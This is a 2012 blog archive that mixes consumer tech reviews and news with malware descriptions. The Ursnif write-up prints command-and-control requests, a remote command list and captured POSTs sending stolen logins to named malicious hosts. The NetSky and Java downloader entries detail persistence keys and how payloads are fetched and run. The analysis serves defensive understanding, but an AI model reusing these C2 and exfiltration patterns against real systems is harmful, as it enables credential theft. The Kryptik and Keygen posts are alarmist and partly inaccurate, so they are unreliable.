Saturday, October 27, 2012

Trojan.Kryptik


Trojan.Kryptik

Trojan.Kryptik is a horrible Trojan that will cause you many computer problems as well as vast amounts of irritation.Trojan.Kryptik basically is a generic detection geared towards a very dangerous Trojan that has the ability to create itself again and again.Trojan.Kryptik has very terrifying risk factors to it,with the inclusion of infecting all computers who make use of the Windows operating system. As you can imagine, this means that the majority of the world that uses computer are at risk of being infected by Trojan.Kryptik.

Trojan.Kryptik may go by the following names:
• TrojanKryptik
• Trojan Kryptik

Trojan.Kryptik may display the following symptoms:
• Your computer may decrease in speed.
• You may experience vast amounts of pop ups.
• You may find unclassified processes running in Task Manager.
• Your browsing performance may decrease in speed.
• Files may re install themselves even after removal.
• File may appear and disappear without you having done anything.

Trojan.Kryptik is extremely malicious due to the factor that it is able to actually reinstall its files after being deleted. The fundamental problem with this is that it causes the manual removal process to be extremely hard.Trojan.Kryptik is able to actually also hide itself in running processes on your machine as well as create multiple dangerous files on your system.Trojan.Kryptik is able to block any computer security related applications which you may have running on your machine.Trojan.Kryptik is also able to prevent security applications from entering the quarantine process as well as being able to prevent some of its files from updating on the definition database.

Trojan.Kryptik will only cause you problems and is better avoided. If you suspect that you may have running on your Trojan.Kryptik machine, then you need to remove it immediately. You have the option of the manual removal process or alternatively the automatic removal process. You need to be aware of the factor that if you decide to choose the manual removal process, the risks are high of you causing even more additional damage to your computer. It is seriously within your best interest to make use of the automatic removal process, which will both detect as well as remove Trojan.Kryptik for you. Remember to use an up to date, reliable and user friendly spyware removal tool.


Thursday, October 18, 2012

About The HackTool

About The HackTool:Win32/Keygen

Computer virus is extremely dangerous for the health of the computer. It can exploit the working of your computer system. If you detect problems in working on your system then definitely your system is infected with harmful virus. HackTool:Win32/Keygen is classified as harmful virus which is one of creation of remote hackers. As it name implies, it hacks your system and steal the sensitive data without the users knowledge or consent. It leaves malicious codes in the system and records all your browsing activity.
HackTool:Win32/Keygen is evolved and expanded. It has infected millions of computer globally. It is also able to download additional virus and tries to take over all the system. CRCK_KEYGEN, Troj/Keygen, not-a-virus Keygen are its common aliases. It is a tricky virus which cannot be trusted. Actually it promotes its antivirus program. It have capability to disable your updated antivirus. When you scan your system it displays fake scanning reports and tactics on you to buy its licensed version. If it trace your system then you would have to suffer with great data loss. So try to stop it in its early phase. It is strongly recommended don’t avoid its presence. Remove it quicky by using powerful tool.
Number of Infections of HackTool:Win32/Keygen: HackTool:Win32/Keygen is very lethal and propagates very vigorously. According to experts, it could infects as many as 60 files at a time which is quite high.
Operating System platforms infected by HackTool:Win32/Keygen: HackTool:Win32/Keygen is equally dangerous for all the Windows System. Windows Operating System including Windows XP, Vista, Windows 7 etc are the soft targets of HackTool:Win32/Keygen infection.
Through Email attachments:
Freeware downloads and social plug-ins:
Through social file sharing:
Visiting Porn and Malicious sites:
Below given guidelines can help you to prevent the entrance of HackTool:Win32/Keygen like infections on the Windows system:
Use Advance System Security Software: To maintain the system running effectively without any interruption, it is mandatory to use highly advance system security programs which can prevent the unauthorized access.
Enable Firewall Settings: By enabling the firewall settings option on Windows system, you will be able to stop the access of malicious computer threat which are trying to gain access on the user computer.
Make use of Strong passwords over Network: The use of strong passwords are very much recommended to maintain the security of system.
Avoid Freeware and Shareware Downloads: It is necessary that you should avoid downloading fareware and shareware program from web. It is because many of the addware and malware programs enters to the PC without any user knowledge with the files related with the program.
Take Caution While Opening Attachments: It is suggested to avoid opening the attachments coming from untrusted source. If you are opening such files then you should require to first scan the entire system using effective anti-virus program.
  

Tuesday, October 16, 2012

LG Optimus 4X HD

The Optimus LG 4X HD is the company’s first with a quad-core processor. But since the arrival of the Samsung Galaxy S3, will anyone give a 4X?

LG Optimus 4X HD review: Hands-on

Love


  • Classy styling
  • Great battery life
  • Gorgeous display

Hate

  • Not latest Android
  • Average camera
  • Low-rent widget icons
LG’s latest premium Android, the LG 4X HD, is a stylish machine. It has a crisp, clean design with neat details like the chrome edging in subtly varying widths and the rough, matte back. It’s not as wide as the Samsung Galaxy S3 and it doesn’t feel like a palm-stretcher as Samsung’s does, even though the screen is only 0.1in smaller.

Android phone makers can add their own styling to Google’s operating software and LG matches earlier LG blowers. This isn’t as sophisticated as Samsung’s or as gorgeous and feature-packed as HTC’s and the shortcut icons look cartoony on this hi-res display.
But the way the widgets shrink as they are swiped offscreen is cute. As is the lock screen which, as you stroke your finger across it, reveals the home screen in a circular window that moves with your finger. Neat. This phone, by the way, comes with Ice Cream Sandwich, not the very latest Jelly Bean software.

LG Optimus 4X HD: Build

There’s a fashion for phones with sealed battery units, to maximise cell power and minimise the space for the battery’s casing. But the 4X HD has a removable back (handy if you want to swap batteries). Some phones with pop-off backs can creak when you flex them but this one is solid and silent.
The power button on the top edge is perhaps a little too recessed for easy use, but the other button, the volume rocker on the left edge, is neatly hidden. It falls under the thumb naturally enough but is so discreet it’s hard to see when you’re looking directly at it.

LG Optimus 4X HD: Features

The 4X HD has the now standard resolution for smartphone snappers: an 8MP camera. There’s also a 1.3MP sensor facing front. Still shots were acceptable but not especially strong or instant – shutter lag was evident in lower-light shots.
Video was strong, however, with autofocus that worked well, despite what you may have read elsewhere. The facility to zoom in while shooting by pinching the screen was useful.

LG Optimus 4X HD: Screen

The 4.7in display on the LG 4X HD is one of the phone’s standout features. It has high pixel density (312ppi), so not much less than the iPhone 4S’s much-vaunted Retina Display. It’s sharp, then, but also bright and vividly coloured. It’s a pleasure to look at.

LG Optimus 4X HD: Performance

Quad core means speed, right? Well, it certainly seems to here. The phone is very responsive, from simple tasks to heavy ones conducted with lots of programs running. Pages load super-fast, apps open instantly. It’s very satisfying to use. The only downside comes when your data connection is slow but that’s not LG’s fault, of course.

LG Optimus 4X HD: Battery

This phone has a powerful battery, at 2150mAH it’s more powerful than the one in the Samsung Galaxy S3. As a result, it’s easily enough to see you through a full day’s usage, though we’d still recommend nightly recharging.

LG Optimus 4X HD: Verdict

The LG 4X HD is a slick, impressive phone that will last all day with ease and do everything at speed with no slowdown, no making you wait. The screen is great: rich and vibrant with plenty of pin-sharp detail.
And the styling is LG at its best – quirky but classy and in a case that fits well in the hand. LG’s biggest problem is that other phones – like the Samsung Galaxy S3 and the HTC One X – offer as much if not more. Still, it’s easier to hold than the Samsung

ASUS PadFone 2

 All the ASUS PadFone 2 UK specs, features plus details on the release date and price for the Android smartphone/tablet mash-up

The smartphone with tablet (or a tablet with a smartphone) is back and ASUS has called it unsurprisingly, the PadFone 2. Hoping to solve all your mobile needs from one device, we've  previously praised the Taiwanese firm for its brilliant Transformer tablet family, named the original ASUS PadFone in our Hot 100 and let’s not forget that it helped bring the T3 Award-winning Google Nexus 7 to life.
Can ASUS flex its muscles in the smartphone market? Here’s T3 look at the key features of the PadFone 2 and how it matches up to its

Build and design

ASUS says it has completely redesigned the hybrid tablet and smartphone device to reduce the overall thickness and weight taking the combined bulk of the 10.1-inch tablet and 4.7-inch smartphone down to 649g from 853g. The handset is now heavier at 135g but at 9mm thick is a little slender, but not quite in the realms of the iPhone 5.
Docking the smartphone into its tablet-friendly body has now changed getting rid of the lid and using a Micro-USB/HDMI hybrid connector now slides the handset into the back of the tablet which should make it much easier to switch between the two modes.

Screen

While the tablet display is largely the same as the 10.1inch WXGA 1280x800 resolution one that featured on the first PadFone, the smartphone has jumped from a 4.3 inch to a 4.7-inch Samsung Galaxy S3-sized screen with 1280 x 720 HD resolution and Super IPS+ display technology to produce excellent viewing angles.
That should mean an improvement in the resolution department compared to the 960x540 qHD Super AMOLED screen on the first PadFone. Both tablet and smartphone screens boast Corning Fit Glass to improve picture sharpness and deliver a more vibrant colourful display.

Processor

With two devices to power, the PadFone 2 upgrades from a 1.5GHz dualcore Snapdragon processor to new S4 quadcore innards which along with 2GB of RAM should ensure it can handle the toughest tasks without breaking a sweat.

Operating System

Disappointingly, the PadFone 2 will feature Android 4.0 Ice Cream Sandwich just as the original did which means it misses out on the slickness of the latest Jelly Bean update. For those worried about apps working across both devices, ASUS claims that apps will be optimized to support both tablet and phone modes.

 

Camera

Taking care of pictures is a 13-Megapixel rear-facing camera (up from 8-Megapixels) which can also shoot 1080p full HD video at 30fps or 720p HD footage at 60fps. A wide f2.4 aperture will look after low-lit photography while the Burst mode can take up to 100 pictures snapping six shots per second whilst filming a bit like the HTC One X range and Samsung Galaxy S3 are capable of. There’s a 1.2-Megapixel front-facing camera, however there are no details as to quality (or appearance) of a camera for the PadFone Station.

Battery

Improving on both fronts ASUS has swapped the swapped the 1,520mAh Lithium smartphone battery for a higher capacity 2,140mAh one promising between 13-15 hours of playtime with the PadFone 2. The 5,000mAh capacity battery nestled in the PadFone 2 Station will get you around 36 hours 3G talk time and has the ability to recharge the handset three times over.

Connectivity

The big news is that the PadFone 2 supports LTE which means it will benefit from the increased speed of a 4G wireless connection, on top of existing 3G and Wi-Fi capabilities. Another new addition is NFC which let you share webpages and contacts and details about your favourite apps from Google Play, while only one data plan is required to use between devices.

Storage

Available in 16GB, 32GB and 64GB you’ll also have access to 50GB of ASUS WebStorage for free for two years which is a year shorter than was offered with the original PadFone.

Your Universe Online

Image Credit: Nintendo
redOrbit Staff & Wire Reports – Your Universe Online
Nintendo has slashed the price of its legacy Wii console to $129.99, and will begin including copies of both Wii Sports and Wii Sports Resort with the device, the company said on Monday.
The new, lower-priced package will include a black Wii, both games on a single disc, a black Wii Remote Plus and a Nunchuk controller. The new configuration, which will be widely available in the U.S. by October 28, will phase out the current $149 black hardware bundle that comes with New Super Mario Bros.
“Nearly six years after it launched, people are still attracted to the pure, inclusive fun of the Wii console,” said Scott Moffitt, Nintendo of America’s executive vice president of sales and marketing.
“A new suggested retail price and the inclusion of two great games make it an easy choice for families looking for a great value this holiday season.”
Nintendo’s move is the third official U.S. price drop in the Wii’s six-year history, and marks the first time that Wii Sports and Wii Sports Resort are included on a single disc.
The games include a variety of sports such as baseball, bowling, tennis, archery and basketball.
Separately, Nintendo’s upcoming Wii U system will begin shipping on November 18, just in time for the holiday shopping season. The console will come in two versions: a Basic Set with 8GB of storage that sells for $299.99, and a Deluxe Set with 32GB of storage that sells for $349.99.

Source: redOrbit Staff & Wire Reports - Your Universe Online

redOrbit (http://s.tt/1qbqc)

Microsoft Shows Off The Surface…

Image Credit: Microsoft
Michael Harper for redOrbit.com
When Microsoft took the stage last night in Los Angeles for their very special event to talk about their “tablet strategy,” it was pretty obvious they’d be announcing their own tablet. After all, All Things D — as they often do — announced as much last Friday.
Sure enough, after some brief back-patting, (wherein they boasted their long-tenured legacy as a hardware company…) they unveiled the Microsoft Surface. No, not THAT Surface. The new Surface is Microsoft’s very own tablet which not only signifies a strong push towards uniformity in concept and design, it also strongly signifies the possible end of some of their partnerships. Of course, the last part is pure conjecture, but solid conjecture nonetheless.
To begin, the Microsoft Surface comes in 2 different varieties and in two different sizes. Reminiscent to the way they sell their Windows Operating system (Currently they offer Windows 7 Home Premium, Windows 7 Professional and Windows 7 Ultimate) Microsoft said they will offer a Surface for Windows RT and a Surface for Windows 8 Pro.
The inimitable tech blog The Verge was able to get their hands on the tech sheets for these new tablet devices and found the Surface for Windows RT will be powered by an ARM chip and weighs in at 1.5 pounds in a svelte 9.3 mm thin frame. The Surface for Windows 8 Pro, on the other hand, is powered by Intel’s Ivy Bridge processor for a “Full Windows” experience. The latter variant of the Surface weighs 2 pounds and is 13.5 mm thin. Both versions of Surface for Windows feature a Kickstand—complete with satisfying Car-Door-Closing-Click—magnesium case, and will be available in 32 or 64 GB. The Surface for Windows 8 Pro, on the other hand, will be available in a 128 GB version.
Both versions carry the slots and ports people seem to be asking for these days, including USB 2.0 and 3.0 (on the Surface for Windows RT and Surface for Windows 8 Pro, respectively) as well as microSD and microSDXC, respectively. Those users willing to spring for the Surface for Windows 8 Pro model will also have the added option of a magnetic stylus which will attach to the side of the device.
Speaking of magnets, the Surface for Windows RT and Surface for Windows 8 Pro will each work with Microsoft’s new Touch Cover and Type Cover keyboards. Think Apple’s Smart Covers, but with keyboards attached. The Type Cover boasts a full, tactile keyboard with the addition of a full touch pad. The Touch Cover also features the same full touch trackpad, but uses a multitouch-style keyboard instead of actual, clicky-key action. Just like the Smart Covers before them, the Type Cover and Touch Cover for Surface attach via magnets on the side of the tablet.
Microsoft’s unveiling of a new piece of hardware is definitely an interesting move, especially since they’ve been pushing to get their partners — Asus, Dell, HP, Lenovo — on board with their new Windows RT and Windows 8 operating systems. When asked about this potential rift between the notoriously software-driven company and their hardware partners, Steve Ballmer said they only planned to “prime the pump” for the upcoming release of Windows 8. He also told The Verge the Microsoft Surface for Windows is “an important companion to the whole Windows 8 story. It’s an important piece; it’s not the only piece.”
After Microsoft showed off the device and its accessories — as well as a brief explanation of how much time they spent on making the kickstand sound like a car door — they had nothing else to reveal in the way of pricing or availability. In fact, it wasn’t until after the event that the always-ready team at The Verge was able to get a list of specs. (Still no word on battery life, however.) So, Microsoft’s Surface for Windows RT and Surface for Windows 8 Pro may be available at some point in the future (presumably “around” the Windows 8 launch for the RT, and “3 months after” for the Pro) at a “competitive” price point.
While we wait for all the unknowns to become known, we’ll be watching those partners responsible for bringing the Windows experience to the masses — Asus, Dell, HP, Lenovo and the gang — to see what their reaction to this news will be. Perhaps we’ll see some announcements in kind about a sudden switch to Android?

Source: Michael Harper for redOrbit.com

redOrbit (http://s.tt/1f2h0)

Dell XPS 15 review

Dell XPS 15 review
using raw power with good looks, the Dell XPS 15 is Windows’ answer to the Macbook Pro and one of the best laptops we’ve seen this year

Love

  • Awesome build quality
  • Excellent screen and speakers
  • Enough power for gaming

Hate

  • Average battery life
  • A bit on the heavy side
  • No internal SSD
If there was a Windows machine to rival the mighty MacBook Pro, the Dell XPS 15 would be it. Dell’s latest offering has bleeding-edge specifications, a fantastic HD screen and great usability. Of course, it’s all wrapped up in a gorgeous silver chassis typical of the XPS range.

Taking the fight to other top-tier laptops like the HP Envy 17 and the Sony S Series, the Dell XPS 15 boasts an Ivy Bridge processor, dedicated graphics and a full 1080p Gorilla Glass display. Trust us, the result is seriously impressive. 

Dell XPS 15: Features

Dell’s customary XPS chassis hasn’t changed drastically despite several updates. The silver brushed metal chassis still looks fantastic and is offset with the black interior, complete with an isolation-style backlit keyboard. There’s not a hint of cheap plastic, and the glorious screen is almost bezel-less, meaning that the XPS 15 could be mistaken for a 14-incher.

Elsewhere you’ll find a built-in Blu-ray drive, 8GB of RAM and a 1TB hard drive. There’s no solid state drive, so start-up can seem a bit sluggish – especially when compared to super speedy Ultrabooks – but once it’s out of the blocks this machine goes strong even under heavy strain from multitasking.

If there’s one criticism that could be levelled at the Dell XPS 15, it’s the weight, and while the Apple MacBook Pro has been on a diet, this 2.5kg model is still a burden to carry.

Dell XPS 15: Screen

Fans of 1080p high definition video need look no further than the XPS 15. Dell has crammed 1,920 x 1,080 pixels on to the 15-inch screen which has been crafted from Corning’s Gorilla Glass.

There’s very little reflection from the glossy finish and viewing angles are excellent thanks to the 350nit brightness.

Dell XPS 15: Performance

The Intel Ivy Bridge CPU inside the XPS 15 stormed through our benchmarking tests and totally outperformed even the top-level second generation Intel-powered laptops. No matter what programs you’re looking to run – from video editing software through to Minesweeper or Online Scrabble, this machine can handle it.

Our gaming benchmark scores were some of the highest on test, thanks to the Nvidia GeForce 640M processor with 2GB of dedicated video memory. The XPS 15 tapped out with the likes of Battlefield 3 on full detail settings, but Batman: Arkham City ran without any problems.

Dell XPS 15: Battery

Laptop reviews

We tested the XPS 15 out with some looped 1080p high definition video, on top of a high-performance benchmarking program and the battery gave out after 226 minutes of continuous use.
We expect any machine at this price point to hit well above the 200 minute mark – so in fairness we’d have to say this is an average result. We’d ideally like to see the XPS 15 pushing for 300 minutes. However, with conservative use you can probably squeeze five hours from this machine.

Dell XPS 15: Verdict

Criticising the Dell XPS 15 is a bit like taking a crack at Helen of Troy - we could do it, but history doesn’t remember such transgressions. If you’re looking for a laptop that combines enough power to multitask your most demanding programs and look good doing it, then you’ve arrived at the right review.

The amazing HD display, great usability and Ivy Bridge power are all standout highlights and make the Dell XPS 15 the inevitable Windows alternative to the Macbook Pro. This is easily one of the best laptops we’ve ever seen.

Apple iPhone 5 vs Samsung Galaxy S3

The Apple iPhone 5 takes on the Samsung Galaxy S3, but who comes out on top in this epic clash of the titans? We square up the specs to find out
Whether you love the sound of the new iPhone 5, or massively underwhelmed by the latest Apple smartphone instalment, it's probably going to sell in its millions and have fanboys queuing outside Apple Stores across the world.
Fear not Android lovers, for the Samsung Galaxy S3 is an Android smartphone goliath that should prove worthy competition for the iPhone 5. The question is, does the S3 actually boast better features than the latest Apple blower? It's time for a smartphone spec showdown...

Apple iPhone 5 vs Samsung Galaxy S3: Build

Apple iPhone 5
Let’s start with the chassis because, let’s face it, that’s the only distinct visible change to differentiate it from its two previous family members. Grasp the frame in your hand and the first thing you’ll notice is the weight; it’s the lightest iPhone ever.

By a long way. At 112g, it’s 20% daintier than the iPhone 4S, 16% less butch than the Samsung Galaxy S3 and 14% lighter than the HTC One X. Reducing the SIM to weency, or ‘nano’, size has helped, minutely, as has making the shell out of anodised aluminium.

The brace of glass strips adorning the top and bottom of the rear give both the black/slate and white/silver models a premium feel but are actually employed to allow an uninterrupted phone signal. No-one wants another antennagate.

Samsung Galaxy S3
Available in 'Marble White' and 'Pebble Blue' (pebble... blue?!) and now titanium grey, the Galaxy S3 is sporting a curvier look than the iPhone 5 . It actually looks far less like it's older brother, and actually more resembles of the Samsung Galaxy Nexus, both in size and contours, although the plastic finish on the back feels more premium than its predecessor. Measuring 136.6 x 70.6 x 8.6mm, the S3 is slightly longer, wider and fatter than the S2 (125.3 x 66.1 x 8.49mm), which may prove to bit a little on the large side for some although the extra thickness may actually make the S3 slightly easier to hold and less likely to slip from your hand, particularly when taking a photo. At 133g, the S3 is very slightly heavier than the S2, although only by 3 grams, so it's barely noticeable.

Apple iPhone 5 vs Samsung Galaxy S3: Screen

Apple iPhone 5
The four-inch screen, which we’ll come onto in detail shortly, is Apple’s belated nod to the industry trend for bigger displays, and means the iPhone 5 now stands a proud 123.8mm tall – width remains the same at 58.6mm. The extra screen real-estate is welcome, though smaller-handed iPhone users might struggle to reach the standby button with a forefinger while holding it in a natural position. They might even have to stretch for the extra top row of apps. Just hold it a different way, perhaps.
It’s still a lovely and Retina; it now boasts 326ppi and a resolution of 1136x640; it’s equally as bright and slightly richer in colour. There’s space for a whole extra row of apps – woop! – and tasks can still be performed with one hand. The main benefit is that you can just see more. Web pages are longer, movies are wider, though many we found from iTunes and YouTube still have to be stretched or cropped to fill the screen, the photo viewing area is bigger (just) and Apple’s own, optimised apps make good use of the extra space.

Samsung Galaxy S3
The S3 one-ups the iPhone 4S and HTC One X on screen size, with an enormous 4.8-inch HD Super AMOLED screen, which displays at a maximum resolution of 720 x 1280. At 306 pixels per inch, the screen is slightly below the quality of the HTC One X and the iPhone 4S but frankly, 306ppi is still eye-searing stuff. Everything that we said about the HTC looking great because of it's size is even more true of the Samsung Galaxy S3. Once again the screen uses Super AMOLED technology, to keep the viewing angle as wide as possible.

IBM Bans Use of Siri on Employees’ iPhones

IBM Bans Use of Siri on Employees’ iPhones

SiriNew advances in technology for smartphones, tablets and computers, while eagerly embraced by users, often bring new risks of data breaches or loss of data privacy. Companies that allow their employees to use their own personal devices for work-related purposes may be especially vulnerable. Because of these risks, IBM recently decided to ban the use of Siri — the powerful voice-recognition software on the new iPhone — on employees’ phones.

Win32/NetSky.Q

Win32/NetSky.Q

Win32/NetSky.Q is an internet worm spreading via e-mail messages, P2P networks or shared network drives.
Note: In following text a symbolic inscription %windir% is used instead of the name of directory in which Windows operating system is installed. Of course, this may differ from installation to installation. The subdirectory System or System32 placed in %windir% has a name %system%
The worm is in an executable that is nearly 29 kiobytes long. Upon execution it copies itself into the %windir% directory using the name "FVProtect.exe".
It also creates a file called "userconfig9x.dll", that is 26 kB long. This dynamic library file is then executed.

In order to be run every time the Windows starts, the worm creates Registry entry called "Norton Antivirus AV" in the following key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

The new entry contains the path to "FVProtect.exe".

The following Registry entries are removed by the worm:
HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\PINF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\au.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d3dupdate.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\direct.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Explorer
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\gouday.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OLE
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rate.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\srate.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ssate.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Taskmon
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Services Host
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winupd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\System.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\Video
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DELETE ME
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\direct.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jijbl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msgsvr32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sentry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\service
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Taskmon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\video
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Services Host
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winupd.exe
This way, some older worms can be deactivated, if present on the system.

The following files are created in the %windir% directory: base64.tmp, zip1.tmp, zip2.tmp, zip3.tmp, zipped.tmp.
These are used when the e-mail messages are composed.

The worm searches all local disks for directories, that contain some of the following strings in their names:
bear
donkey
download
ftp
htdocs
http
icq
kazaa
lime
morpheus
mule
my shared folder
shar
shared files
upload
The messages used for spreading the worm are composed using a long list of strings. The address of the sender is either randomly picked from the harvested addresses, or it may be one of the addresses contained in the worm:
abuse@gov.us
noreply@paypal.com
support@symantec.com
Subject of the message is chosen from the list below:
-do0-i4grjj40j09gjijgp
0i09u5rug08r89589gjrg
Administrator
approved
Congratulations!
corrected
Do you?
Body of the e-mail contains one of the following messages, but it can also be blank.
9u049u89gh89fsdpokofkdpbm3-4i
Are you a spammer? (I found your email on a spammer website!?!)
Authentication required.
Bad Gateway: The message has been attached.
Best wishes, your friend.
Binary message is available.
Can you confirm it?
Congratulations!, your best friend.
Delivered message is attached.
Do not visit this illegal websites!
Encrypted message is available.
The attachment can either be an executable or a ZIP archive. If it's an EXE file, it has two extensions. The first one is either ".doc" or ".txt",
and the other is ".exe", ".scr" or ".pif".

If the attachment is a ZIP archive, its extension is ".zip". The archive contains the Win32/Netsky.Q executable. The file inside the archive can have three different names:
document.txt .exe
data.rtf .scr
details.txt .pif



Trojan.Spy.Ursnif.F

Trojan.Spy.Ursnif.F


Spreading: medium
Damage: high
Size: approx 50k
Discovered: 2010 Oct 20

SYMPTOMS:
Extra http traffic.
TECHNICAL DESCRIPTION:
      Trojan.Spy.Ursnif is a malware that is able to steal personal information and control the infected computer.
      It finds out the type of browser (iexplorer, firefox, safari, chrome, opera), information used later for stealing specific passwords.
It takes a snapshot of all the processes and injects itself to iexplore or firefox and also hooks some functions: InternetReadFile,
InternetWriteFile, CreateProcess, HttpSendRequest  to intercept browser trafic.   
     The backdoor behaviour starts when it connects to a server that appers with diffrent host names : rettinasl.com, hasterulits.com, thecargotime.com, tryfindithere.com. From time to time it sends requests to the server. The request has a standard form:
    GET /cgi-bin/cmd.cgi?user_id=2806922672&version_id=2037028&passphrase=fkjvhsdvlksdhvlsd&socks=0&version=2037028&crc=00000000 HTTP/1.1

    The version id is memorized in a registry key:    
        Subkey = HKCU\Software\AppDataLow\{0a7cdb08-42c7-a17a-bc91-b0554eeb624f}
        Value    = Version
        Data      = Hex:001F1524 , Decimal:2037028
    The user_id is random.

    If the request succeeds and the connection is established the malware takes control:
      - it receives commands:
            - download               - DL_EXE=http://ne[removed].cn/sol.exe /DL_EXE_ST=http://ne[removed].cn /sol.exe ;
            - kill windows           - KILL (writes in "\\.\C:" a 0x10000 size buffer( the module of the current    process));
            - reboot system        - REBOOT;
             - take screenshots - SCREENSHOT;
            - delete cookies       - CLEAR_COOK;

      - when the user logs on diffrent internet accounts it sends the private information (user_name,passwords) to a remote location:
            example wireshark capture:

            POST /cgi-bin/forms.cgi HTTP/1.1
            Content-Type: multipart/form-data; boundary=--------------------------2b01852b01852b0185
            User-Agent: IE
            Host: tryfindithere.com
            Content-Length: 337
            Cache-Control: no-cache
            ----------------------------2b01852b01852b0185
            Content-Disposition: form-data; name="upload_file"; filename="2806922672.2037028"
            Content-Type: application/octet-stream
             URL: http://fa[removed]war.com/index.php
            login_username=TEST&login_password=TEST&serverid=1&submitit.x=89&submitit.y=23
     
        - it downloads an encrypted buffer to a memory location that contains :
            - the names of some bank websites : millenniumbcp.pt , santandertotta.pt, grupobanif, caixaebanking.cgd.pt;
            - some javascript code to identify and steal passwords, user names, card pins from those bank websites;
  
        - also when the user logs on those bank websites, screenshot pictures are send to a remote location :
            example wireshark capture:
         
            POST /cgi-bin/ss.cgi HTTP/1.1
            Content-Type: multipart/form-data; boundary=--------------------------905c4c905c4c905c4c
            User-Agent: IE
            Host: thecargotime.com
            Content-Length: 146030
            Cache-Control: no-cache
            ----------------------------905c4c905c4c905c4c
            Content-Disposition: form-data; name="upload_file"; filename="2806922672.2037028"
            Content-Type: application/octet-stream
  
       It creates events with restricted rights: denied for guest and anonymouse users ( D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)).
       Every action is executed by threads that are syncronized using critical sections or events.
        It uses a pipe for communication between threads (read/write).

Trojan.Flame.A

Trojan.Flame.A

Spreading: medium
Damage: very high
Size: ~20MB
Discovered: 2012 May 28

SYMPTOMS:
Presence of the following files:
%windir%\\system32\\commgr32.dll
%windir%\\system32\\comspol32.dll
%windir%\\system32\\comspol32.ocx
%windir%\\system32\\indsvc32.dll
%windir%\\system32\\indsvc32.ocx
%windir%\\system32\\modevga.com
%windir%\\system32\\mssui.drv
%windir%\\system32\\scaud32.exe
%windir%\\system32\\sdclt32.exe
%windir%\\system32\\watchxb.sys
%windir%\\system32\\winconf32.ocx
Presence of this directory:
%COMMONPROGRAMFILES%\\Microsoft Shared\\MSSecurityMgr\\
TECHNICAL DESCRIPTION:
This is a multi-component malware for targeted attacks. It is able to spy, leak data, download/execute other components.

Please let Bitdefender disinfect your files.
You can also download our removal tool:
http://labs.bitdefender.com/2012/05/cyber-espionage-reaches-new-levels-with-flamer/

New Virus Attack ! Java Trojan Downloader

Java.Trojan.Downloader.OpenConnection.AI is a malicious Java applet that downloads and executes arbitrary files. In the wild, it can be found as a Java archive. The malicious HTML passes the encrypted URL of the file to download and execute as the parameter a to the applet. The applet uses the CVE-2010-0840 exploit to bypass the Java sandbox.
 
The JAR file contains four class files in the bpac package:
  • KAVS.class;
  • a$1.class;
  • a.class - the applet;
  • b.class - the URL decrypter.
The applet starts out by generating a random name for the executable under the system temporary directory. The name is made up entirely of random digits and has the extension ".exe" appended.
Next, it checks whether the operating system is Windows, by searching for the string Windows in the os.name system property.
If the OS checks out, the applet downloads the file and executes it with a call to Runtime#exec.
The code is somewhat obfuscated, for example, the names of the system properties java.io.tmpdir and os.name appear reversed.
 
We have observed two variants of the decrypter:
  1. One performs a series of single-character replacements on the URL, then appends
    the string "?i=1".
  2. The other one is a bit more complex, it assumes the URL isn’t encrypted at all, and duplicates some of the applet’s code. It downloads the file at the given URL, assumes it’s a PE executable and checks the Characteristics field of the IMAGE_FILE_HEADER for 0x2000, i.e., IMAGE_FILE_DLL.
    It generates a random name made up of digits for the executable, under the system temporary directory, it appends the proper extension taking into account whether the file is a DLL or an EXE. If it’s an EXE, it executes it with a call to Runtime#exec, just like the applet does, if it’s a DLL, it registers it using regsvr32.